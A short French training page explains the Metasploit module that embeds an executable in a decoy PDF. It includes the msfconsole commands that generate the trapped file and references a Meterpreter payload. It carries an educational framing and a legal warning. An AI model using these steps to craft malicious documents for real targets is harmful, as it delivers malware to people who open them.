Adobe pdf embedded exe
🔒 Contenu de sécurité — usage encadré
Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).
Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.
| Fiche express | |
|---|---|
| Domaine | Exploitation côté client — format de fichier |
| Module | exploit/windows/fileformat/adobe_pdf_embedded_exe
|
| Contexte | Metasploit |
| Voir aussi | Fichiers exploit · Meterpreter |
Le module adobe_pdf_embedded_exe intègre un exécutable dans un document PDF d'apparence légitime. À l'ouverture du PDF par la cible, l'exécutable embarqué est lancé. C'est une technique d'exploitation côté client : elle repose sur l'action de l'utilisateur plutôt que sur une faille réseau.
Génération du PDF piégé
msfconsole
search pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show options
set FILENAME evildocument.pdf
set INFILENAME /root/Desktop/willie.pdf
exploit
INFILENAME: le PDF légitime servant de support.FILENAME: le nom du PDF piégé produit.
Voir aussi
- Fichiers exploit — exploitation via d'autres formats de fichiers
- Meterpreter — payload obtenu après exécution